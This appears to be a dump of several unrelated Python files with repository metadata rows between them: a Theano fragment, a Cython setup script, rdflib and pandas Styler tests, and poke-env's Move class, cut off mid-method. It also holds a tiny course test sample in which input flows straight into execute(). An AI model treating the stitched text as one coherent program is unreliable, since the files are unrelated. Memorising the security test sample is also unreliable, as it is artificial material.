"""
if self.destroyers:
ords = self.orderings(fgraph)
if _contains_cycle(fgraph, ords):
raise InconsistencyError("Dependency graph contains cycles")
else:
# James's Conjecture:
# If there are no destructive ops, then there can be no cycles.
# FB: This isn't always True. It can happend that
# optimization introduce node that depend on itself. This
# is very rare and should not happen in general. It will be
# caught later. The error will be far from the source. But
# doing this conjecture should speed up compilation most of
# the time. The user should create such dependency except
# if he mess too much with the internal.
pass
return True
def orderings(self, fgraph):
"""
Return orderings induced by destructive operations.
Raise InconsistencyError when
a) attempting to destroy indestructable variable, or
b) attempting to destroy a value multiple times, or
c) an Apply destroys (illegally) one of its own inputs by aliasing
"""
rval = OrderedDict()
if self.destroyers:
# BUILD DATA STRUCTURES
# CHECK for multiple destructions during construction of variables
droot, impact, __ignore = self.refresh_droot_impact()
# check for destruction of constants
illegal_destroy = [r for r in droot if
getattr(r.tag, 'indestructible', False) or
isinstance(r, graph.Constant)]
if illegal_destroy:
raise InconsistencyError(
"Attempting to destroy indestructible variables: %s" %
illegal_destroy)
# add destroyed variable clients as computational dependencies
for app in self.destroyers:
# for each destroyed input...
for output_idx, input_idx_list in iteritems(app.op.destroy_map):
destroyed_idx = input_idx_list[0]
destroyed_variable = app.inputs[destroyed_idx]
root = droot[destroyed_variable]
root_impact = impact[root]
# we generally want to put all clients of things which depend on root
# as pre-requisites of app.
# But, app is itself one such client!
# App will always be a client of the node we're destroying
# (destroyed_variable, but the tricky thing is when it is also a client of
# *another variable* viewing on the root. Generally this is illegal, (e.g.,
# add_inplace(x, x.T). In some special cases though, the in-place op will
# actually be able to work properly with multiple destroyed inputs (e.g,
# add_inplace(x, x). An Op that can still work in this case should declare
# so via the 'destroyhandler_tolerate_same' attribute or
# 'destroyhandler_tolerate_aliased' attribute.
#
# destroyhandler_tolerate_same should be a list of pairs of the form
# [(idx0, idx1), (idx0, idx2), ...]
# The first element of each pair is the input index of a destroyed
# variable.
# The second element of each pair is the index of a different input where
# we will permit exactly the same variable to appear.
# For example, add_inplace.tolerate_same might be [(0,1)] if the destroyed
# input is also allowed to appear as the second argument.
#
# destroyhandler_tolerate_aliased is the same sort of list of
# pairs.
# op.destroyhandler_tolerate_aliased = [(idx0, idx1)] tells the
# destroyhandler to IGNORE an aliasing between a destroyed
# input idx0 and another input idx1.
# This is generally a bad idea, but it is safe in some
# cases, such as
# - the op reads from the aliased idx1 before modifying idx0
# - the idx0 and idx1 are guaranteed not to overlap (e.g.
# they are pointed at different rows of a matrix).
#
# CHECK FOR INPUT ALIASING
# OPT: pre-compute this on import
tolerate_same = getattr(app.op,
'destroyhandler_tolerate_same', [])
assert isinstance(tolerate_same, list)
tolerated = OrderedSet(idx1 for idx0, idx1 in tolerate_same
if idx0 == destroyed_idx)
tolerated.add(destroyed_idx)
tolerate_aliased = getattr(
app.op, 'destroyhandler_tolerate_aliased', [])
assert isinstance(tolerate_aliased, list)
ignored = OrderedSet(idx1 for idx0, idx1 in tolerate_aliased
if idx0 == destroyed_idx)
# print 'tolerated', tolerated
# print 'ignored', ignored
for i, input in enumerate(app.inputs):
if i in ignored:
continue
if input in root_impact \
and (i not in tolerated or
input is not destroyed_variable):
raise InconsistencyError("Input aliasing: %s (%i, %i)"
% (app, destroyed_idx, i))
# add the rule: app must be preceded by all other Apply instances that
# depend on destroyed_input
root_clients = OrderedSet()
for r in root_impact:
assert not [a for a, c in self.clients[r].items() if not c]
root_clients.update([a for a, c in self.clients[r].items() if c])
root_clients.remove(app)
if root_clients:
rval[app] = root_clients
return rval
| 42.005854
| 109
| 0.571001
|
ac90c1ce33f0dc5fe69d17a9d10aa45508603969
| 955
|
py
|
Python
|
libnd4j/auto_vectorization/cython_setup.py
|
eric-erki/deeplearning4j
|
b9d462f66879e9315767b70190bd2ab31b9a3275
|
[
"Apache-2.0"
] | null | null | null |
libnd4j/auto_vectorization/cython_setup.py
|
eric-erki/deeplearning4j
|
b9d462f66879e9315767b70190bd2ab31b9a3275
|
[
"Apache-2.0"
] | null | null | null |
libnd4j/auto_vectorization/cython_setup.py
|
eric-erki/deeplearning4j
|
b9d462f66879e9315767b70190bd2ab31b9a3275
|
[
"Apache-2.0"
] | null | null | null |
# /* ******************************************************************************
# * Copyright (c) 2021 Deeplearning4j Contributors
# *
# * This program and the accompanying materials are made available under the
# * terms of the Apache License, Version 2.0 which is available at
# * https://www.apache.org/licenses/LICENSE-2.0.
# *
# * Unless required by applicable law or agreed to in writing, software
# * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# * License for the specific language governing permissions and limitations
# * under the License.
# *
# * SPDX-License-Identifier: Apache-2.0
# ******************************************************************************/
from distutils.core import setup
from Cython.Build import cythonize
setup(ext_modules=cythonize("bigGzipJson.pyx", language_level="3"))
| 47.75
| 84
| 0.606283
|
48f2e4de851d53249c37a5389990dd64d992a6e1
| 857
|
py
|
Python
|
test/test_issue923.py
|
tonyfast/rdflib
|
e4fe0fdbd4de7e1183418f302315b51a14602e03
|
[
"BSD-3-Clause"
] | 2
|
2021-02-06T17:36:05.000Z
|
2021-04-21T07:33:39.000Z
|
test/test_issue923.py
|
pragya16067/rdflib
|
6b5bd37ccc67bdec62d2e36d174eb7933b5020b2
|
[
"BSD-3-Clause"
] | 2
|
2020-05-09T15:03:57.000Z
|
2020-05-30T10:51:40.000Z
|
test/test_issue923.py
|
pragya16067/rdflib
|
6b5bd37ccc67bdec62d2e36d174eb7933b5020b2
|
[
"BSD-3-Clause"
] | 4
|
2020-05-08T08:36:19.000Z
|
2020-05-28T07:23:23.000Z
|
"""
Issue 923: split charset off of Content-Type before looking up Result-parsing plugin.
"""
from io import StringIO
from rdflib.query import Result
RESULT_SOURCE = u"""\
{
"head" : {
"vars" : [ "subject", "predicate", "object", "context" ]
},
"results" : {
"bindings" : [ {
"subject" : {
"type" : "bnode",
"value" : "service"
},
"predicate" : {
"type" : "uri",
"value" : "http://www.w3.org/1999/02/22-rdf-syntax-ns#type"
},
"object" : {
"type" : "uri",
"value" : "http://www.w3.org/ns/sparql-service-description#Service"
}
}]
}
}
"""
def test_issue_923():
with StringIO(RESULT_SOURCE) as result_source:
Result.parse(
source=result_source,
content_type="application/sparql-results+json;charset=utf-8",
)
| 21.974359
| 85
| 0.546091
|
7afe0e0a22b822708018357bece0a9ad433352e3
| 51
|
py
|
Python
|
T03-24/program.py
|
maa76/SSof-Project1920
|
9b4ad9ac41a648c425fcfcd49cd52ff84e528bde
|
[
"MIT"
] | 2
|
2019-11-20T19:26:07.000Z
|
2019-11-22T00:42:23.000Z
|
T03-24/program.py
|
maa76/SSof-Project1920
|
9b4ad9ac41a648c425fcfcd49cd52ff84e528bde
|
[
"MIT"
] | 2
|
2019-11-28T05:21:24.000Z
|
2019-11-28T05:21:58.000Z
|
T03-24/program.py
|
maa76/SSof-Project1920
|
9b4ad9ac41a648c425fcfcd49cd52ff84e528bde
|
[
"MIT"
] | 25
|
2019-11-27T01:40:56.000Z
|
2019-12-04T23:38:59.000Z
|
a = True
while not True:
a = get()
execute(a)
| 10.2
| 16
| 0.568627
|
b98a548101877c860f426326cba159b7991da7b4
| 18,571
|
py
|
Python
|
pandas/tests/io/formats/style/test_html.py
|
gasparitiago/pandas
|
c4cce9b75b34179edf000314edf708768486fcbb
|
[
"BSD-3-Clause"
] | null | null | null |
pandas/tests/io/formats/style/test_html.py
|
gasparitiago/pandas
|
c4cce9b75b34179edf000314edf708768486fcbb
|
[
"BSD-3-Clause"
] | null | null | null |
pandas/tests/io/formats/style/test_html.py
|
gasparitiago/pandas
|
c4cce9b75b34179edf000314edf708768486fcbb
|
[
"BSD-3-Clause"
] | null | null | null |
from textwrap import dedent
import numpy as np
import pytest
from pandas import (
DataFrame,
MultiIndex,
option_context,
)
jinja2 = pytest.importorskip("jinja2")
from pandas.io.formats.style import Styler
loader = jinja2.PackageLoader("pandas", "io/formats/templates")
env = jinja2.Environment(loader=loader, trim_blocks=True)
@pytest.fixture
def styler():
return Styler(DataFrame([[2.61], [2.69]], index=["a", "b"], columns=["A"]))
@pytest.fixture
def styler_mi():
midx = MultiIndex.from_product([["a", "b"], ["c", "d"]])
return Styler(DataFrame(np.arange(16).reshape(4, 4), index=midx, columns=midx))
@pytest.fixture
def tpl_style():
return env.get_template("html_style.tpl")
@pytest.fixture
def tpl_table():
return env.get_template("html_table.tpl")
def test_html_template_extends_options():
# make sure if templates are edited tests are updated as are setup fixtures
# to understand the dependency
with open("pandas/io/formats/templates/html.tpl") as file:
result = file.read()
assert "{% include html_style_tpl %}" in result
assert "{% include html_table_tpl %}" in result
def test_exclude_styles(styler):
result = styler.to_html(exclude_styles=True, doctype_html=True)
expected = dedent(
"""\
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
</head>
<body>
<table>
<thead>
<tr>
<th > </th>
<th >A</th>
</tr>
</thead>
<tbody>
<tr>
<th >a</th>
<td >2.610000</td>
</tr>
<tr>
<th >b</th>
<td >2.690000</td>
</tr>
</tbody>
</table>
</body>
</html>
"""
)
assert result == expected
def test_w3_html_format(styler):
styler.set_uuid("").set_table_styles(
[{"selector": "th", "props": "att2:v2;"}]
).applymap(lambda x: "att1:v1;").set_table_attributes(
'class="my-cls1" style="attr3:v3;"'
).set_td_classes(
DataFrame(["my-cls2"], index=["a"], columns=["A"])
).format(
"{:.1f}"
).set_caption(
"A comprehensive test"
)
expected = dedent(
"""\
<style type="text/css">
#T_ th {
att2: v2;
}
#T__row0_col0, #T__row1_col0 {
att1: v1;
}
</style>
<table id="T_" class="my-cls1" style="attr3:v3;">
<caption>A comprehensive test</caption>
<thead>
<tr>
<th class="blank level0" > </th>
<th id="T__level0_col0" class="col_heading level0 col0" >A</th>
</tr>
</thead>
<tbody>
<tr>
<th id="T__level0_row0" class="row_heading level0 row0" >a</th>
<td id="T__row0_col0" class="data row0 col0 my-cls2" >2.6</td>
</tr>
<tr>
<th id="T__level0_row1" class="row_heading level0 row1" >b</th>
<td id="T__row1_col0" class="data row1 col0" >2.7</td>
</tr>
</tbody>
</table>
"""
)
assert expected == styler.to_html()
def test_colspan_w3():
# GH 36223
df = DataFrame(data=[[1, 2]], columns=[["l0", "l0"], ["l1a", "l1b"]])
styler = Styler(df, uuid="_", cell_ids=False)
assert '<th class="col_heading level0 col0" colspan="2">l0</th>' in styler.to_html()
def test_rowspan_w3():
# GH 38533
df = DataFrame(data=[[1, 2]], index=[["l0", "l0"], ["l1a", "l1b"]])
styler = Styler(df, uuid="_", cell_ids=False)
assert '<th class="row_heading level0 row0" rowspan="2">l0</th>' in styler.to_html()
def test_styles(styler):
styler.set_uuid("abc")
styler.set_table_styles([{"selector": "td", "props": "color: red;"}])
result = styler.to_html(doctype_html=True)
expected = dedent(
"""\
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<style type="text/css">
#T_abc td {
color: red;
}
</style>
</head>
<body>
<table id="T_abc">
<thead>
<tr>
<th class="blank level0" > </th>
<th id="T_abc_level0_col0" class="col_heading level0 col0" >A</th>
</tr>
</thead>
<tbody>
<tr>
<th id="T_abc_level0_row0" class="row_heading level0 row0" >a</th>
<td id="T_abc_row0_col0" class="data row0 col0" >2.610000</td>
</tr>
<tr>
<th id="T_abc_level0_row1" class="row_heading level0 row1" >b</th>
<td id="T_abc_row1_col0" class="data row1 col0" >2.690000</td>
</tr>
</tbody>
</table>
</body>
</html>
"""
)
assert result == expected
def test_doctype(styler):
result = styler.to_html(doctype_html=False)
assert "<html>" not in result
assert "<body>" not in result
assert "<!DOCTYPE html>" not in result
assert "<head>" not in result
def test_doctype_encoding(styler):
with option_context("styler.render.encoding", "ASCII"):
result = styler.to_html(doctype_html=True)
assert '<meta charset="ASCII">' in result
result = styler.to_html(doctype_html=True, encoding="ANSI")
assert '<meta charset="ANSI">' in result
def test_bold_headers_arg(styler):
result = styler.to_html(bold_headers=True)
assert "th {\n font-weight: bold;\n}" in result
result = styler.to_html()
assert "th {\n font-weight: bold;\n}" not in result
def test_caption_arg(styler):
result = styler.to_html(caption="foo bar")
assert "<caption>foo bar</caption>" in result
result = styler.to_html()
assert "<caption>foo bar</caption>" not in result
def test_block_names(tpl_style, tpl_table):
# catch accidental removal of a block
expected_style = {
"before_style",
"style",
"table_styles",
"before_cellstyle",
"cellstyle",
}
expected_table = {
"before_table",
"table",
"caption",
"thead",
"tbody",
"after_table",
"before_head_rows",
"head_tr",
"after_head_rows",
"before_rows",
"tr",
"after_rows",
}
result1 = set(tpl_style.blocks)
assert result1 == expected_style
result2 = set(tpl_table.blocks)
assert result2 == expected_table
def test_from_custom_template_table(tmpdir):
p = tmpdir.mkdir("tpl").join("myhtml_table.tpl")
p.write(
dedent(
"""\
{% extends "html_table.tpl" %}
{% block table %}
<h1>{{custom_title}}</h1>
{{ super() }}
{% endblock table %}"""
)
)
result = Styler.from_custom_template(str(tmpdir.join("tpl")), "myhtml_table.tpl")
assert issubclass(result, Styler)
assert result.env is not Styler.env
assert result.template_html_table is not Styler.template_html_table
styler = result(DataFrame({"A": [1, 2]}))
assert "<h1>My Title</h1>\n\n\n<table" in styler.to_html(custom_title="My Title")
def test_from_custom_template_style(tmpdir):
p = tmpdir.mkdir("tpl").join("myhtml_style.tpl")
p.write(
dedent(
"""\
{% extends "html_style.tpl" %}
{% block style %}
<link rel="stylesheet" href="mystyle.css">
{{ super() }}
{% endblock style %}"""
)
)
result = Styler.from_custom_template(
str(tmpdir.join("tpl")), html_style="myhtml_style.tpl"
)
assert issubclass(result, Styler)
assert result.env is not Styler.env
assert result.template_html_style is not Styler.template_html_style
styler = result(DataFrame({"A": [1, 2]}))
assert '<link rel="stylesheet" href="mystyle.css">\n\n<style' in styler.to_html()
def test_caption_as_sequence(styler):
styler.set_caption(("full cap", "short cap"))
assert "<caption>full cap</caption>" in styler.to_html()
@pytest.mark.parametrize("index", [False, True])
@pytest.mark.parametrize("columns", [False, True])
@pytest.mark.parametrize("index_name", [True, False])
def test_sticky_basic(styler, index, columns, index_name):
if index_name:
styler.index.name = "some text"
if index:
styler.set_sticky(axis=0)
if columns:
styler.set_sticky(axis=1)
left_css = (
"#T_ {0} {{\n position: sticky;\n background-color: white;\n"
" left: 0px;\n z-index: {1};\n}}"
)
top_css = (
"#T_ {0} {{\n position: sticky;\n background-color: white;\n"
" top: {1}px;\n z-index: {2};\n{3}}}"
)
res = styler.set_uuid("").to_html()
# test index stickys over thead and tbody
assert (left_css.format("thead tr th:nth-child(1)", "3 !important") in res) is index
assert (left_css.format("tbody tr th:nth-child(1)", "1") in res) is index
# test column stickys including if name row
assert (
top_css.format("thead tr:nth-child(1) th", "0", "2", " height: 25px;\n") in res
) is (columns and index_name)
assert (
top_css.format("thead tr:nth-child(2) th", "25", "2", " height: 25px;\n")
in res
) is (columns and index_name)
assert (top_css.format("thead tr:nth-child(1) th", "0", "2", "") in res) is (
columns and not index_name
)
@pytest.mark.parametrize("index", [False, True])
@pytest.mark.parametrize("columns", [False, True])
def test_sticky_mi(styler_mi, index, columns):
if index:
styler_mi.set_sticky(axis=0)
if columns:
styler_mi.set_sticky(axis=1)
left_css = (
"#T_ {0} {{\n position: sticky;\n background-color: white;\n"
" left: {1}px;\n min-width: 75px;\n max-width: 75px;\n z-index: {2};\n}}"
)
top_css = (
"#T_ {0} {{\n position: sticky;\n background-color: white;\n"
" top: {1}px;\n height: 25px;\n z-index: {2};\n}}"
)
res = styler_mi.set_uuid("").to_html()
# test the index stickys for thead and tbody over both levels
assert (
left_css.format("thead tr th:nth-child(1)", "0", "3 !important") in res
) is index
assert (left_css.format("tbody tr th.level0", "0", "1") in res) is index
assert (
left_css.format("thead tr th:nth-child(2)", "75", "3 !important") in res
) is index
assert (left_css.format("tbody tr th.level1", "75", "1") in res) is index
# test the column stickys for each level row
assert (top_css.format("thead tr:nth-child(1) th", "0", "2") in res) is columns
assert (top_css.format("thead tr:nth-child(2) th", "25", "2") in res) is columns
@pytest.mark.parametrize("index", [False, True])
@pytest.mark.parametrize("columns", [False, True])
@pytest.mark.parametrize("levels", [[1], ["one"], "one"])
def test_sticky_levels(styler_mi, index, columns, levels):
styler_mi.index.names, styler_mi.columns.names = ["zero", "one"], ["zero", "one"]
if index:
styler_mi.set_sticky(axis=0, levels=levels)
if columns:
styler_mi.set_sticky(axis=1, levels=levels)
left_css = (
"#T_ {0} {{\n position: sticky;\n background-color: white;\n"
" left: {1}px;\n min-width: 75px;\n max-width: 75px;\n z-index: {2};\n}}"
)
top_css = (
"#T_ {0} {{\n position: sticky;\n background-color: white;\n"
" top: {1}px;\n height: 25px;\n z-index: {2};\n}}"
)
res = styler_mi.set_uuid("").to_html()
# test no sticking of level0
assert "#T_ thead tr th:nth-child(1)" not in res
assert "#T_ tbody tr th.level0" not in res
assert "#T_ thead tr:nth-child(1) th" not in res
# test sticking level1
assert (
left_css.format("thead tr th:nth-child(2)", "0", "3 !important") in res
) is index
assert (left_css.format("tbody tr th.level1", "0", "1") in res) is index
assert (top_css.format("thead tr:nth-child(2) th", "0", "2") in res) is columns
def test_sticky_raises(styler):
with pytest.raises(ValueError, match="No axis named bad for object type DataFrame"):
styler.set_sticky(axis="bad")
@pytest.mark.parametrize(
"sparse_index, sparse_columns",
[(True, True), (True, False), (False, True), (False, False)],
)
def test_sparse_options(sparse_index, sparse_columns):
cidx = MultiIndex.from_tuples([("Z", "a"), ("Z", "b"), ("Y", "c")])
ridx = MultiIndex.from_tuples([("A", "a"), ("A", "b"), ("B", "c")])
df = DataFrame([[1, 2, 3], [4, 5, 6], [7, 8, 9]], index=ridx, columns=cidx)
styler = df.style
default_html = styler.to_html() # defaults under pd.options to (True , True)
with option_context(
"styler.sparse.index", sparse_index, "styler.sparse.columns", sparse_columns
):
html1 = styler.to_html()
assert (html1 == default_html) is (sparse_index and sparse_columns)
html2 = styler.to_html(sparse_index=sparse_index, sparse_columns=sparse_columns)
assert html1 == html2
@pytest.mark.parametrize("index", [True, False])
@pytest.mark.parametrize("columns", [True, False])
def test_applymap_header_cell_ids(styler, index, columns):
# GH 41893
func = lambda v: "attr: val;"
styler.uuid, styler.cell_ids = "", False
if index:
styler.applymap_index(func, axis="index")
if columns:
styler.applymap_index(func, axis="columns")
result = styler.to_html()
# test no data cell ids
assert '<td class="data row0 col0" >2.610000</td>' in result
assert '<td class="data row1 col0" >2.690000</td>' in result
# test index header ids where needed and css styles
assert (
'<th id="T__level0_row0" class="row_heading level0 row0" >a</th>' in result
) is index
assert (
'<th id="T__level0_row1" class="row_heading level0 row1" >b</th>' in result
) is index
assert ("#T__level0_row0, #T__level0_row1 {\n attr: val;\n}" in result) is index
# test column header ids where needed and css styles
assert (
'<th id="T__level0_col0" class="col_heading level0 col0" >A</th>' in result
) is columns
assert ("#T__level0_col0 {\n attr: val;\n}" in result) is columns
@pytest.mark.parametrize("rows", [True, False])
@pytest.mark.parametrize("cols", [True, False])
def test_maximums(styler_mi, rows, cols):
result = styler_mi.to_html(
max_rows=2 if rows else None,
max_columns=2 if cols else None,
)
assert ">5</td>" in result # [[0,1], [4,5]] always visible
assert (">8</td>" in result) is not rows # first trimmed vertical element
assert (">2</td>" in result) is not cols # first trimmed horizontal element
def test_replaced_css_class_names(styler_mi):
css = {
"row_heading": "ROWHEAD",
# "col_heading": "COLHEAD",
"index_name": "IDXNAME",
# "col": "COL",
"row": "ROW",
# "col_trim": "COLTRIM",
"row_trim": "ROWTRIM",
"level": "LEVEL",
"data": "DATA",
"blank": "BLANK",
}
midx = MultiIndex.from_product([["a", "b"], ["c", "d"]])
styler_mi = Styler(
DataFrame(np.arange(16).reshape(4, 4), index=midx, columns=midx),
uuid_len=0,
).set_table_styles(css_class_names=css)
styler_mi.index.names = ["n1", "n2"]
styler_mi.hide_index(styler_mi.index[1:])
styler_mi.hide_columns(styler_mi.columns[1:])
styler_mi.applymap_index(lambda v: "color: red;", axis=0)
styler_mi.applymap_index(lambda v: "color: green;", axis=1)
styler_mi.applymap(lambda v: "color: blue;")
expected = dedent(
"""\
<style type="text/css">
#T__ROW0_col0 {
color: blue;
}
#T__LEVEL0_ROW0, #T__LEVEL1_ROW0 {
color: red;
}
#T__LEVEL0_col0, #T__LEVEL1_col0 {
color: green;
}
</style>
<table id="T_">
<thead>
<tr>
<th class="BLANK" > </th>
<th class="IDXNAME LEVEL0" >n1</th>
<th id="T__LEVEL0_col0" class="col_heading LEVEL0 col0" >a</th>
</tr>
<tr>
<th class="BLANK" > </th>
<th class="IDXNAME LEVEL1" >n2</th>
<th id="T__LEVEL1_col0" class="col_heading LEVEL1 col0" >c</th>
</tr>
<tr>
<th class="IDXNAME LEVEL0" >n1</th>
<th class="IDXNAME LEVEL1" >n2</th>
<th class="BLANK col0" > </th>
</tr>
</thead>
<tbody>
<tr>
<th id="T__LEVEL0_ROW0" class="ROWHEAD LEVEL0 ROW0" >a</th>
<th id="T__LEVEL1_ROW0" class="ROWHEAD LEVEL1 ROW0" >c</th>
<td id="T__ROW0_col0" class="DATA ROW0 col0" >0</td>
</tr>
<tr>
</tr>
<tr>
</tr>
<tr>
</tr>
</tbody>
</table>
"""
)
result = styler_mi.to_html()
assert result == expected
def test_include_css_style_rules_only_for_visible_cells(styler_mi):
# GH 43619
result = (
styler_mi.set_uuid("")
.applymap(lambda v: "color: blue;")
.hide_columns(styler_mi.data.columns[1:])
.hide_index(styler_mi.data.index[1:])
.to_html()
)
expected_styles = dedent(
"""\
<style type="text/css">
#T__row0_col0 {
color: blue;
}
</style>
"""
)
assert expected_styles in result
def test_include_css_style_rules_only_for_visible_index_labels(styler_mi):
# GH 43619
result = (
styler_mi.set_uuid("")
.applymap_index(lambda v: "color: blue;", axis="index")
.hide_columns(styler_mi.data.columns)
.hide_index(styler_mi.data.index[1:])
.to_html()
)
expected_styles = dedent(
"""\
<style type="text/css">
#T__level0_row0, #T__level1_row0 {
color: blue;
}
</style>
"""
)
assert expected_styles in result
def test_include_css_style_rules_only_for_visible_column_labels(styler_mi):
# GH 43619
result = (
styler_mi.set_uuid("")
.applymap_index(lambda v: "color: blue;", axis="columns")
.hide_columns(styler_mi.data.columns[1:])
.hide_index(styler_mi.data.index)
.to_html()
)
expected_styles = dedent(
"""\
<style type="text/css">
#T__level0_col0, #T__level1_col0 {
color: blue;
}
</style>
"""
)
assert expected_styles in result
| 30.544408
| 88
| 0.577029
|
5d4aa998e1af997675a5fd4ac6be020f32f71d33
| 25,252
|
py
|
Python
|
src/poke_env/environment/move.py
|
etafer/poke-env
|
2a96969ea1afb3f2576a6a8711a9a268b3ac8ee4
|
[
"MIT"
] | 145
|
2019-11-01T22:38:02.000Z
|
2022-03-21T06:06:18.000Z
|
src/poke_env/environment/move.py
|
Benjamin-Etheredge/poke-env
|
30462cecd2e947ab6f0b06b0f2febbdde3918366
|
[
"MIT"
] | 229
|
2019-11-11T09:51:45.000Z
|
2022-03-29T10:16:24.000Z
|
src/poke_env/environment/move.py
|
Benjamin-Etheredge/poke-env
|
30462cecd2e947ab6f0b06b0f2febbdde3918366
|
[
"MIT"
] | 77
|
2019-11-11T09:17:18.000Z
|
2022-03-17T11:33:48.000Z
|
# -*- coding: utf-8 -*-
from poke_env.data import MOVES, GEN_TO_MOVES
from poke_env.environment.field import Field
from poke_env.environment.move_category import MoveCategory
from poke_env.environment.pokemon_type import PokemonType
from poke_env.environment.status import Status
from poke_env.environment.weather import Weather
from poke_env.utils import to_id_str
from functools import lru_cache
from typing import Dict
from typing import List
from typing import Optional
from typing import Set
from typing import Tuple
from typing import Union
SPECIAL_MOVES: Dict
_PROTECT_MOVES = {
"protect",
"detect",
"endure",
"spikyshield",
"kingsshield",
"banefulbunker",
"obstruct",
"maxguard",
}
_SIDE_PROTECT_MOVES = {"wideguard", "quickguard", "matblock"}
_PROTECT_COUNTER_MOVES = _PROTECT_MOVES | _SIDE_PROTECT_MOVES
class Move:
_MISC_FLAGS = [
"onModifyMove",
"onEffectiveness",
"onHitField",
"onAfterMoveSecondarySelf",
"onHit",
"onTry",
"beforeTurnCallback",
"onAfterMove",
"onTryHit",
"onTryMove",
"hasCustomRecoil",
"onMoveFail",
"onPrepareHit",
"onAfterHit",
"onBasePower",
"basePowerCallback",
"damageCallback",
"onTryHitSide",
"beforeMoveCallback",
]
_MOVES_DICT = GEN_TO_MOVES[8]
__slots__ = "_id", "_current_pp", "_dynamaxed_move", "_is_empty", "_request_target"
def __init__(self, move: str = "", move_id: Optional[str] = None):
if move_id:
self._id = move_id
else:
self._id: str = self.retrieve_id(move)
self._current_pp = self.max_pp
self._is_empty: bool = False
self._dynamaxed_move = None
self._request_target = None
def __repr__(self) -> str:
return f"{self._id} (Move object)"
def use(self) -> None:
self._current_pp -= 1
@staticmethod
def is_id_z(id_) -> bool:
if id_.startswith("z") and id_[1:] in MOVES:
return True
return "isZ" in MOVES[id_]
@staticmethod
def is_max_move(id_) -> bool:
if id_.startswith("max"):
return True
elif MOVES[id_].get("isNonstandard", None) == "Gigantamax":
return True
elif MOVES[id_].get("isMax", None) is not None:
return True
return False
@staticmethod
@lru_cache(4096)
def should_be_stored(move_id: str) -> bool:
if move_id in SPECIAL_MOVES:
return False
if move_id not in MOVES:
return False
if Move.is_id_z(move_id):
return False
if Move.is_max_move(move_id):
return False
return True
@property
def accuracy(self) -> float:
"""
:return: The move's accuracy (0 to 1 scale).
:rtype: float
"""
accuracy = self.entry["accuracy"]
if accuracy is True:
return 1.0
return accuracy / 100
@property
def base_power(self) -> int:
"""
:return: The move's base power.
:rtype: int
"""
return self.entry.get("basePower", 0)
@property
def boosts(self) -> Optional[Dict[str, float]]:
"""
:return: Boosts conferred to the target by using the move.
:rtype: Optional[Dict[str, float]]
"""
return self.entry.get("boosts", None)
@property
def breaks_protect(self) -> bool:
"""
:return: Whether the move breaks proect-like defenses.
:rtype: bool
"""
return self.entry.get("breaksProtect", False)
@property
def can_z_move(self) -> bool:
"""
:return: Wheter there exist a z-move version of this move.
:rtype: bool
"""
return self.id not in SPECIAL_MOVES
@property
def category(self) -> MoveCategory:
"""
:return: The move category.
:rtype: MoveCategory
"""
return MoveCategory[self.entry["category"].upper()]
@property
def crit_ratio(self) -> int:
"""
:return: The move's crit ratio. If the move is guaranteed to crit, returns 6.
:rtype:
"""
if "critRatio" in self.entry:
return int(self.entry["critRatio"])
elif "willCrit" in self.entry:
return 6
return 0
@property
def current_pp(self) -> int:
"""
:return: Remaining PP.
:rtype: int
"""
return self._current_pp
@property
def damage(self) -> Union[int, str]:
"""
:return: The move's fix damages. Can be an int or 'level' for moves such as
Seismic Toss.
:rtype: Union[int, str]
"""
return self.entry.get("damage", 0)
@property
def deduced_target(self) -> Optional[str]:
"""
:return: Move deduced target, based on Move.target and showdown's request
messages.
:rtype: str, optional
"""
if self.id in SPECIAL_MOVES:
return self.target
elif self.request_target:
return self.request_target
elif self.target == "randomNormal":
return self.request_target
return self.target
@property
def defensive_category(self) -> MoveCategory:
"""
:return: Move's defender category.
:rtype: MoveCategory
"""
if "defensiveCategory" in self.entry:
return MoveCategory[self.entry["defensiveCategory"].upper()]
return self.category
@property
def drain(self) -> float:
"""
:return: Ratio of HP of inflicted damages, between 0 and 1.
:rtype: float
"""
if "drain" in self.entry:
return self.entry["drain"][0] / self.entry["drain"][1]
return 0.0
@property
def dynamaxed(self):
"""
:return: The dynamaxed version of the move.
:rtype: DynamaxMove
"""
if self._dynamaxed_move:
return self._dynamaxed_move
self._dynamaxed_move = DynamaxMove(self)
return self._dynamaxed_move
@property
def entry(self) -> dict:
"""
Should not be used directly.
:return: The data entry corresponding to the move
:rtype: dict
"""
if self._id in self._MOVES_DICT:
return self._MOVES_DICT[self._id]
elif self._id.startswith("z") and self._id[1:] in self._MOVES_DICT:
return self._MOVES_DICT[self._id[1:]]
else:
raise ValueError("Unknown move: %s" % self._id)
@property
def expected_hits(self) -> float:
"""
:return: Expected number of hits, between 1 and 5. Equal to n_hits if n_hits is
constant.
:rtype: float
"""
if self._id == "triplekick" or self._id == "tripleaxel":
# Triple Kick and Triple Axel have an accuracy check for each hit, and also
# rise in BP for each hit
return 1 + 2 * 0.9 + 3 * 0.81
min_hits, max_hits = self.n_hit
if min_hits == max_hits:
return min_hits
else:
# It hits 2-5 times
assert min_hits == 2 and max_hits == 5
return (2 + 3) / 3 + (4 + 5) / 6
@property
def flags(self) -> Set[str]:
"""
This property is not well defined, and may be missing some information.
If you need more information on some flag, please open an issue in the project.
:return: Flags associated with this move. These can come from the data or be
custom.
:rtype: Set[str]
"""
flags = set(self.entry["flags"])
flags.update(set(self.entry.keys()).intersection(self._MISC_FLAGS))
return flags
@property
def force_switch(self) -> bool:
"""
:return: Whether this move forces switches.
:rtype: bool
"""
return self.entry.get("forceSwitch", False)
@property
def heal(self) -> float:
"""
:return: Proportion of the user's HP recovered.
:rtype: float
"""
if "heal" in self.entry:
return self.entry["heal"][0] / self.entry["heal"][1]
return 0.0
@property
def id(self) -> str:
"""
:return: Move id.
:rtype: str
"""
return self._id
@property
def ignore_ability(self) -> bool:
"""
:return: Whether the move ignore its target's ability.
:rtype: bool
"""
return self.entry.get("ignoreAbility", False)
@property
def ignore_defensive(self) -> bool:
"""
:return: Whether the opponent's stat boosts are ignored.
:rtype: bool
"""
return self.entry.get("ignoreDefensive", False)
@property
def ignore_evasion(self) -> bool:
"""
:return: Wheter the opponent's evasion is ignored.
:rtype: bool
"""
return self.entry.get("ignoreEvasion", False)
@property
def ignore_immunity(self) -> Union[bool, Set[PokemonType]]:
"""
:return: Whether the opponent's immunity is ignored, or a list of ignored
immunities.
:rtype: bool or set of Types
"""
if "ignoreImmunity" in self.entry:
if isinstance(self.entry["ignoreImmunity"], bool):
return self.entry["ignoreImmunity"]
else:
return {
